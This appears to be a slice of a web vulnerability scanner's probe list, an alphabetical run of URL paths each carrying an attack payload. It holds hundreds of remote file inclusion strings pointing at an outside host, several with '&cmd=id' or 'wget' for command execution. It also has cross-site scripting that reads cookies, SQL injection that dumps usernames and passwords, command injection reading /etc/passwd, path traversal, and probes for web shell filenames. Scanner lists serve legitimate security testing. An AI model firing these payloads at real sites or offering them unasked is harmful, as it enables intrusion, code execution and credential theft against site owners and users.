classes/Cache.class.php?rootdir=http://www.yxlink.com/nvs_test.txt?
classes/Customer.class.php?rootdir=http://www.yxlink.com/nvs_test.txt?
classes/Performance.class.php?rootdir=http://www.yxlink.com/nvs_test.txt?
classes/Project.class.php?rootdir=http://www.yxlink.com/nvs_test.txt?
classes/Representative.class.php?rootdir=http://www.yxlink.com/nvs_test.txt?
classes/User.class.php?rootdir=http://www.yxlink.com/nvs_test.txt?
classes/admin_o.php?absolutepath=http://www.yxlink.com/nvs_test.txt
classes/adodbt/sql.php?classes_dir=http://www.yxlink.com/nvs_test.txt
classes/board_o.php?absolutepath=http://www.yxlink.com/nvs_test.txt
classes/class_admin.php?PathToComment=http://www.yxlink.com/nvs_test.txt?
classes/class_comments.php?PathToComment=http://www.yxlink.com/nvs_test.txt?
classes/class_mail.inc.php?path_to_folder=http://www.yxlink.com/nvs_test.txt
classes/common.php?rootdir=http://www.yxlink.com/nvs_test.txt?
classes/core/language.php?rootdir=http://www.yxlink.com/nvs_test.txt
classes/dev_o.php?absolutepath=http://www.yxlink.com/nvs_test.txt
classes/file_o.php?absolutepath=http://www.yxlink.com/nvs_test.txt
classes/html/com_articles.php?absolute_path=http://www.yxlink.com/nvs_test.txt
classes/main_class.php?default_path=http://www.yxlink.com/nvs_test.txt
classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://www.yxlink.com/nvs_test.txt
classes/query.class.php?baseDir=http://www.yxlink.com/nvs_test.txt
classes/tech_o.php?absolutepath=http://www.yxlink.com/nvs_test.txt
classified.php?insPath=http://www.yxlink.com/nvs_test.txt
classified_right.php?language_dir=http://www.yxlink.com/nvs_test.txt
classifieds/index.php?lowerTemplate=http://www.yxlink.com/nvs_test.txt
clear.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
clearinfo.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\x5C\x22>< script>alert(1)/script><\x5C\x22
cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>
click.php?dir=http://www.yxlink.com/nvs_test.txt?
client.php?dir=http://www.yxlink.com/nvs_test.txt
client/faq_1/PageController.php?dir=http://www.yxlink.com/nvs_test.txt
clients/index.php?src=http://www.yxlink.com/nvs_test.txt
cls_fast_template.php?fname=http://www.yxlink.com/nvs_test.txt
clusterframe.jsp?cluster=<script>alert(2222)</script>
clusterframe.jsp?cluster=<script>alert(document.cookie)</script>
cm68news/engine/oldnews.inc.php?addpath=http://www.yxlink.com/nvs_test.txt?&
cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=http://www.yxlink.com/nvs_test.txt?
cms/meetweb/classes/ManagerResource.class.php?root_path=http://www.yxlink.com/nvs_test.txt
cms/meetweb/classes/ManagerRightsResource.class.php?root_path=http://www.yxlink.com/nvs_test.txt
cms/meetweb/classes/RegForm.class.php?root_path=http://www.yxlink.com/nvs_test.txt
cms/meetweb/classes/RegResource.class.php?root_path=http://www.yxlink.com/nvs_test.txt
cms/meetweb/classes/RegRightsResource.class.php?root_path=http://www.yxlink.com/nvs_test.txt
cms/meetweb/classes/modules.php?root_path=http://www.yxlink.com/nvs_test.txt
cms/modules/form.lib.php?sourceFolder=http://www.yxlink.com/nvs_test.txt?
cms/system/openengine.php?oe_classpath=http://www.yxlink.com/nvs_test.txt???
cms/voteManager/seeresult_bz.jsp?titleid=1%20and%201=(SELECT%20UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(100)||CHR(107)||CHR(111)||CHR(113)||(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(OWNER%20AS%20VARCHAR(4000)),CHR(32))%20FROM%20(SELECT%20OWNER,ROWNUM%20AS%20LIMIT%20FROM%20(SELECT%20DISTINCT(OWNER)%20FROM%20SYS.ALL_TABLES)%20ORDER%20BY%201%20ASC)%20WHERE%20LIMIT=1),CHR(32),CHR(113)||CHR(113)||CHR(113)),CHR(36),CHR(113)||CHR(112)||CHR(113)),CHR(64),CHR(113)||CHR(108)||CHR(113)))||CHR(113)||CHR(108)||CHR(101)||CHR(102)||CHR(113)||CHR(62)))%20FROM%20DUAL)&opid=1
cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://www.yxlink.com/nvs_test.txt?
cn_config.php?tpath=http://www.yxlink.com/nvs_test.txt?
coast/header.php?sections_file=http://www.yxlink.com/nvs_test.txt?
code/
code/berylium-classes.php?beryliumroot=http://www.yxlink.com/nvs_test.txt
code/display.php?admindir=http://www.yxlink.com/nvs_test.txt?
coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.yxlink.com/nvs_test.txt
com
com/
com5.java
com5.pl
com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt?
com_media_library/toolbar_ext.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
comment.php?ctype=1&conid=1%20UNION%20all%20SELECT%20md5(333)%20from%20mysql.user
comment.php?type=filemgmt&cid=filemgmt-1'70
comments.php?AMG_serverpath=http://www.yxlink.com/nvs_test.txt
comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,concat(username,0x4E56535F544553545F474F,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+boka_members%23
comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,md5(8888),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+boka_members%23
comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+where+1=2+union+select+1,2,concat(username,0x4E56535F544553545F474F,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+boka_members%23
comments.php?items_number=1'
comments.php?scriptpath=http://www.yxlink.com/nvs_test.txt?
comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview
comments/browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
common.inc.php?CFG[libdir]=http://www.yxlink.com/nvs_test.txt
common.inc.php?base_path=http://www.yxlink.com/nvs_test.txt
common.php?db_file=http://www.yxlink.com/nvs_test.txt
common.php?dir=http://www.yxlink.com/nvs_test.txt
common.php?ezt_root_path=http://www.yxlink.com/nvs_test.txt?
common.php?include_path=http://www.yxlink.com/nvs_test.txt
common.php?livealbum_dir=http://www.yxlink.com/nvs_test.txt
common.php?locale=http://www.yxlink.com/nvs_test.txt
common.php?phpht_real_path=http://www.yxlink.com/nvs_test.txt?
common/
common/codewidget.jsp?code=1%27
common/db.php?commonpath=http://www.yxlink.com/nvs_test.txt?
common/func.php?CommonAbsD=http://www.yxlink.com/nvs_test.txt?
common/func.php?CommonAbsDir=http://www.yxlink.com/nvs_test.txt
common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
community/Offline.php?sourcedir=http://www.yxlink.com/nvs_test.txt?
component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.yxlink.com/nvs_test.txt
components/calendar/com_calendar.php?absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt
components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_articles.php?absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_calendar.php?absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yxlink.com/nvs_test.txt
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= http://www.yxlink.com/nvs_test.txt?
components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yxlink.com/nvs_test.txt
components/com_forum/download.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_guestbook.php?absolute_path=http://www.yxlink.com/nvs_test.txt?
components/com_hashcash/server.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_joomlaboard/file_upload.php?sbp=http://www.yxlink.com/nvs_test.txt?
components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
components/com_lm/archive.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
components/com_mambowiki/MamboLogin.php?IP=http://www.yxlink.com/nvs_test.txt?
components/com_minibb.php?absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_mospray/scripts/admin.php?basedir=http://www.yxlink.com/nvs_test.txt
components/com_mospray/scripts/admin.php?basedir=http://www.yxlink.com/nvs_test.txt?&cmd=id
components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
components/com_smf/smf.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/core/connect.php?language_path=http://www.yxlink.com/nvs_test.txt
components/minibb/bb_plugins.php?absolute_path=http://www.yxlink.com/nvs_test.txt?
components/minibb/index.php?absolute_path=http://www.yxlink.com/nvs_test.txt
components/xmlparser/loadparser.php?absoluteurl=http://www.yxlink.com/nvs_test.txt
compteur/mapage.php?chemin=http://www.yxlink.com/nvs_test.txt
computers/default.asp?sort=&Direction='
conad/changeEmail.inc.php?mysqlCall=http://www.yxlink.com/nvs_test.txt
conad/changeUserDetails.inc.php?mysqlCall=http://www.yxlink.com/nvs_test.txt
conad/checkPasswd.inc.php?mysqlCall=http://www.yxlink.com/nvs_test.txt
conad/include/mysqlCall.inc.php?config=http://www.yxlink.com/nvs_test.txt
conad/include/rootGui.inc.php?header=http://www.yxlink.com/nvs_test.txt
conad/login.inc.php?mysqlCall=http://www.yxlink.com/nvs_test.txt
conad/logout.inc.php?mysqlCall=http://www.yxlink.com/nvs_test.txt
conf.php?securelib=http://www.yxlink.com/nvs_test.txt
config.inc.php3?rel_path=http://www.yxlink.com/nvs_test.txt
config.inc.php?_path=http://www.yxlink.com/nvs_test.txt
config.inc.php?path_escape=http://www.yxlink.com/nvs_test.txt
config.inc.php?path_escape=http://www.yxlink.com/nvs_test.txt%00
config.php
config.php?full_path=http://www.yxlink.com/nvs_test.txt?
config.php?full_path_to_db=http://www.yxlink.com/nvs_test.txt
config.php?fullpath=http://www.yxlink.com/nvs_test.txt
config.php?incpath=http://www.yxlink.com/nvs_test.txt
config.php?path_to_root=http://www.yxlink.com/nvs_test.txt
config.php?rel_path=http://www.yxlink.com/nvs_test.txt
config.php?rel_path=http://www.yxlink.com/nvs_test.txt?
config.php?rel_path=http://www.yxlink.com/nvs_test.txt? 
config.php?returnpath=http://www.yxlink.com/nvs_test.txt
config.php?sql_language=http://www.yxlink.com/nvs_test.txt?&cmd=0wn3d By Dr
config.php?xcart_dir=http://www.yxlink.com/nvs_test.txt
config/
config/aspcms_config.asp?sa=1
config/config_admin.php?INC=http://www.yxlink.com/nvs_test.txt?
config/config_main.php?INC=http://www.yxlink.com/nvs_test.txt?
config/config_member.php?INC=http://www.yxlink.com/nvs_test.txt?
config/dbutil.bck.php?confdir=http://www.yxlink.com/nvs_test.txt
config/mysql_config.php?INC=http://www.yxlink.com/nvs_test.txt?
config/sender.php?ROOT_PATH=http://www.yxlink.com/nvs_test.txt?
configuration.php?absolute_path=http://www.yxlink.com/nvs_test.txt?
configuration/auditModuleEdit.jsf?name=<IMG SRC=javascript:alert(222)>
configuration/configuration.jsf?');};alert(222);</script><!--
configuration/httpListenerEdit.jsf?name=<IMG SRC=javascript:alert(222)>&configName=server-config
confirmUnsubscription.php?output=http://www.yxlink.com/nvs_test.txt
connect.php?path=http://www.yxlink.com/nvs_test.txt
connexion.php?DOCUMENT_ROOT=http://www.yxlink.com/nvs_test.txt?
console/a?=<script>alert(document.cookie)</script>
contact.php?action=submit&Name='><script>alert('XSS Vulnerability')%3B</script>&EmailAddress=1&AccountUsername=1&Message=1
contact.php?action=submit&Name=1&EmailAddress=1&AccountUsername=' ><script>alert('XSS Vulnerability')%3B</script>&Message=1
contact.php?blog_theme=http://www.yxlink.com/nvs_test.txt
contacts.php?cal_dir=http://www.yxlink.com/nvs_test.txt
contenido/external/frontend/news.php?cfg[path][includes]=http://www.yxlink.com/nvs_test.txt
content.php?content=http://www.yxlink.com/nvs_test.txt
content/admin.php?pwfile=http://www.yxlink.com/nvs_test.txt
content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:
content/base/build/explorer/none.php?/etc/passwd
content/content.php?fileloc=http://www.yxlink.com/nvs_test.txt?
content/delete.php?pwfile=http://www.yxlink.com/nvs_test.txt
content/modify.php?pwfile=http://www.yxlink.com/nvs_test.txt
content/modify_go.php?pwfile=http://www.yxlink.com/nvs_test.txt
contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=http://www.yxlink.com/nvs_test.txt
contrib/mx_glance_sdesc.php?mx_root_path=http://www.yxlink.com/nvs_test.txt
contrib/phpBB2/modules.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
controllers/MySQLController.php?baseDir=http://www.yxlink.com/nvs_test.txt
controllers/SQLController.php?baseDir=http://www.yxlink.com/nvs_test.txt
controllers/SetupController.php?baseDir=http://www.yxlink.com/nvs_test.txt
controllers/VideoController.php?baseDir=http://www.yxlink.com/nvs_test.txt
controllers/ViewController.php?baseDir=http://www.yxlink.com/nvs_test.txt
convert-date.php?cal_dir=http://www.yxlink.com/nvs_test.txt
convert/mvcw.php?step=1&vwar_root=http://www.yxlink.com/nvs_test.txt
convert/mvcw.php?vwar_root=http://www.yxlink.com/nvs_test.txt
core/admin/admin.php?p=admin&absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/admin/categories_add.php?absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/admin/categories_remove.php?absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/admin/editdel.php?p=admin&absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/admin/ftpfeature.php?p=admin&absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/admin/login.php?absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/admin/pgRSSnews.php?absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/admin/showcat.php?absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/archive_cat.php?absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/archive_nocat.php?absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/aural.php?site_absolute_path=http://www.yxlink.com/nvs_test.txt
core/aural.php?site_absolute_path=http://www.yxlink.com/nvs_test.txt?&cmd=dir
core/editor.php?editor_insert_bottom=http://www.yxlink.com/nvs_test.txt
core/includes.php?CMS_ROOT=http://www.yxlink.com/nvs_test.txt?
core/includes/gfw_smarty.php?config[gfwroot]=shell.txt
core/recent_list.php?absoluteurlhttp://www.yxlink.com/nvs_test.txt
core/user.php?cs_cookies[customer_user_id]=1'/*;
coremail/XT3/main/intervalCheck.jsp?sid=111111111111111111</script><script>alert(123)</script>
corpo.php?pagina=http://www.yxlink.com/nvs_test.txt
counter/
cp2.php?securelib=http://www.yxlink.com/nvs_test.txt
cpe/index.php?repertoire_config=http://www.yxlink.com/nvs_test.txt
cpqlogin.htm
cqweb/login?/cqweb/main?command=GenerateMainFrame&service=CQ&schema=SCHEMAHERE\x22; alert('XSS');//&contextid=DATABASECONTEXTHERE\x22; alert('XSS');//
crea.php?plancia=http://www.yxlink.com/nvs_test.txt
creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=http://www.yxlink.com/nvs_test.txt?
creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=http://www.yxlink.com/nvs_test.txt?
creat_news_all.php?language=http://www.yxlink.com/nvs_test.txt
create_file.php?target=http://www.yxlink.com/nvs_test.txt
create_file.php?target=http://www.yxlink.com/nvs_test.txt?
credit/
crm/
cron.php?ROOT_PATH=http://www.yxlink.com/nvs_test.txt
cron.php?include_path=http://www.yxlink.com/nvs_test.txt?
crontab/run_billing.php?config[include_dir]=http://www.yxlink.com/nvs_test.txt
cross.php?url=http://www.yxlink.com/nvs_test.txt
cross.php?url=http://www.yxlink.com/nvs_test.txt 
crossdomain.xml
csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
customMBeans/customMBeans.jsf?');};alert(222);</script><!--
custom_vars.php?sys[path_addon]=http://www.yxlink.com/nvs_test.txt
customer/product.php?xcart_dir=http://www.yxlink.com/nvs_test.txt
customers/
customform/CustomFormJS.asp
customform/CustomFormJS.asp?CustomFormID=%27&FormStyleID=%27
cutenews/index.php?debug
cvsblame.cgi?file=<script>alert('Vulnerable')</script>
cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
cvslog.cgi?file=<script>alert('Vulnerable')</script>
cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
cwb/comanda.php?INCLUDE_PATH=http://www.yxlink.com/nvs_test.txt?
cybershell.php
d.php
dabao.php
dama.php
dana-na/auth/rdremediate.cgi?delivery_mode=</APPLET><SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>&action=tryagain&signinId=url_default
dana.php
dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>
dansguardian/edit.cgi?file=/etc/passwd
dark.php
data/%23aspcms252.asp
data/admin/ver.txt
data/fetch.php?page=
data/mysql_error_trace.inc
data/thumb/44/ed/44ed1732a7e550e7a8874943fc774bad_100_100_.php
datei.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?&cmd=id
day.php?query=CalendarDetailsID=-1) UNION SELECT md5(333),0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*
db.php?q='&t='
db/PollDB.php?CONFIG_DATAREADERWRITER=http://www.yxlink.com/nvs_test.txt?
db/mysql/db.inc.php?SPL_CFG[dirroot]=http://www.yxlink.com/nvs_test.txt?
db4web_c/dbdirname//etc/passwd
dba4.nsf
dbcommon/include.php?_APP_RELATIVE_PATH=http://www.yxlink.com/nvs_test.txt
dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.yxlink.com/nvs_test.txt
dd.php
debug/dbg?host=<script>alert('Vulnerable');</script>
debug/echo?name=<script>alert('Vulnerable');</script>
debug/errorInfo?title=<script>alert('Vulnerable');</script>
debug/showproc?proc=<script>alert('Vulnerable');</script>
debugger.php?config_atkroot=http://www.yxlink.com/nvs_test.txt
decoder/gallery.php?ccms_library_path=http://www.yxlink.com/nvs_test.txt
decoder/markdown.php?ccms_library_path=http://www.yxlink.com/nvs_test.txt
default
default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
defaults_setup.php?ROOT_PATH=http://www.yxlink.com/nvs_test.txt?cmd=ls
defines.php?WEBCHATPATH=http://www.yxlink.com/nvs_test.txt
defines.php?WEBCHATPATH=http://www.yxlink.com/nvs_test.txt?
demo/basic/simple/viewsrc/welcomeuser.jsp.txt
demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=http://www.yxlink.com/nvs_test.txt&
demo/ojspext/events/globals.jsa
demo/sql/index.jsp
demo/xml/xmlquery/viewsrc/XMLQuery.jsp.txt
denglu/
depouilg.php3?NomVote=http://www.yxlink.com/nvs_test.txt?
detail_zt.php?i=1&c=1%20anandd%20%201%20%20is%20%20false%20%20ununionion%20%20selselectect%20%201,username,3,4,id,userpassword,100000000000-35*250,8,9%20%20frfromom%20%20user_info
dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
development.php?root_prefix=http://www.yxlink.com/nvs_test.txt
dfcode.php?DFORUM_PATH=http://www.yxlink.com/nvs_test.txt?
dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.yxlink.com/nvs_test.txt?
dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.yxlink.com/nvs_test.txt?
dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.yxlink.com/nvs_test.txt
dialog.php?CONFIG[MWCHAT_Libs]=http://www.yxlink.com/nvs_test.txt?
dialogs/a.php?spaw_dir=http://www.yxlink.com/nvs_test.txt?&cmd=id
dialogs/collorpicker.php?spaw_dir=http://www.yxlink.com/nvs_test.txt&cmd=id
dialogs/img.php?spaw_dir=http://www.yxlink.com/nvs_test.txt?&cmd=id
dialogs/img_library.php?spaw_dir=http://www.yxlink.com/nvs_test.txt?&cmd=id
dialogs/table.php?spaw_dir=http://www.yxlink.com/nvs_test.txt?&cmd=id
dialogs/td.php?spaw_dir=http://www.yxlink.com/nvs_test.txt?&cmd=id
diapo.php?rep=<script>alert(document.cookie)</script>
dic.php
digitaleye_Path/module.php?menu=http://www.yxlink.com/nvs_test.txt?
dir/prepend.php?_PX_config[manager_path]=http://www.yxlink.com/nvs_test.txt
dir_thatware/config.php?root_path=http://www.yxlink.com/nvs_test.txt'
direct.php?rf=http://www.yxlink.com/nvs_test.txt
direction/index.php?repertoire_config=http://www.yxlink.com/nvs_test.txt
directory.php?dir=%3Bcat%20/etc/passwd
directory/index.php?path=http://www.yxlink.com/nvs_test.txt
dispatch.php?atknodetype=project.activity&atkaction=stats&activityid=0%20UNION%20SELECT%201,md5%28333%29,3,4
dispbbs.asp?boardID=8&ID=550194&page=1\x22><script>alert(333)</script>
dispbbs.php?boardid=2&id=1&page=1&setStmt=,title=(select%20md5(222)%20from%20dv_admin)
display.php?pag=http://www.yxlink.com/nvs_test.txt
display.php?path=http://www.yxlink.com/nvs_test.txt
displayCategory.php?basepath=http://www.yxlink.com/nvs_test.txt
dispuser.asp?name=Walltrapass\x22><script>alert(333)</script>
dix.php3?url_phpartenaire=http://www.yxlink.com/nvs_test.txt
diy.php
dm-albums/template/album.php?SECURITY_FILE=http://www.yxlink.com/nvs_test.txt
dm.php
dms/policy/rep_request.php?report_type=%22%3E%3Cbody+onload=alert(222)%3E%3Cfoo+
dms0
do/form.php?mid=3\x22><script>alert(2333)</script>
do/view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint(\x22Content-Type:text/html\x5Cr\x5Cn\x5Cr\x5Cn<Vulnerable!>\x22)%3bexit
do/vote.php?job=show&cid=%22%3E%3Ciframe%20src=http://www.baidu.com%3E
doc/11.00RelNotes
doc/11iRelNotes.html
doc/11iRelNotes.txt
doc/11iSRB.txt
doc/ASX-JPN
doc/ASX-JPN-E
doc/ASX-JPN-S
doc/ASX-KOR
doc/ASX-SCH
doc/ASX-TCH
doc/ASX-UTF8
doc/Judy/
doc/Judy/COPYRIGHT
doc/Judy/Judy1_3x.htm
doc/Judy/Judy1_funcs_3x.htm
doc/Judy/JudyL_3x.htm
doc/Judy/JudyL_funcs_3x.htm
doc/Judy/JudySL_3x.htm
doc/Judy/JudySL_funcs_3x.htm
doc/Judy/Judy_3x.htm
doc/Judy/LICENSE
doc/Judy/demo/
doc/Judy/demo/JudySort.c
doc/Judy/demo/Makefile
doc/Judy/demo/funhist.c
doc/Judy/demo/interSL.c
doc/LICENSE.SMAIL893
doc/NTP_Primer.txt
doc/PRINT-ASE-NOTE
doc/PRINTER-JPN-E
doc/PRINTER-JPN-S
doc/SETNETLP_Guide-E
doc/SETNETLP_Guide-S
doc/TechPrtServ/
doc/admin/index.php?ptinclude=http://www.yxlink.com/nvs_test.txt
doc/dir.perm.txt
doc/packages/
doc/rt/overview-summary.html
doc/sw_patches.txt
doc/vxvm/
doc/webmin.config.notes
doceboCore/lib/lib.php?GLOBALS[where_framework]=http://www.yxlink.com/nvs_test.txt
doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=http://www.yxlink.com/nvs_test.txt
doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=http://www.yxlink.com/nvs_test.txt
doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=http://www.yxlink.com/nvs_test.txt
doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=http://www.yxlink.com/nvs_test.txt
docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=http://www.yxlink.com/nvs_test.txt
docs/<script>alert('Vulnerable');</script>
docs/NED?action=retrieve&location=.
docs/front-end-demo/cart2.php?workdir=http://www.yxlink.com/nvs_test.txt?
docs/sdb/en/html/index.html
docs/showdoc.php?css=1>\x22><ScRiPt%20%0a%0d>alert(123)%3B</ScRiPt>
docs/showtemp.cfm?TYPE=JPEG&FILE=c:\x5Cboot.ini
dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=http://www.yxlink.com/nvs_test.txt?&cmd=wget%20XXpathXX
door.php
dose.pl?daily&somefile.txt&|ls|
dosearch.php?RESPATH=http://www.yxlink.com/nvs_test.txt
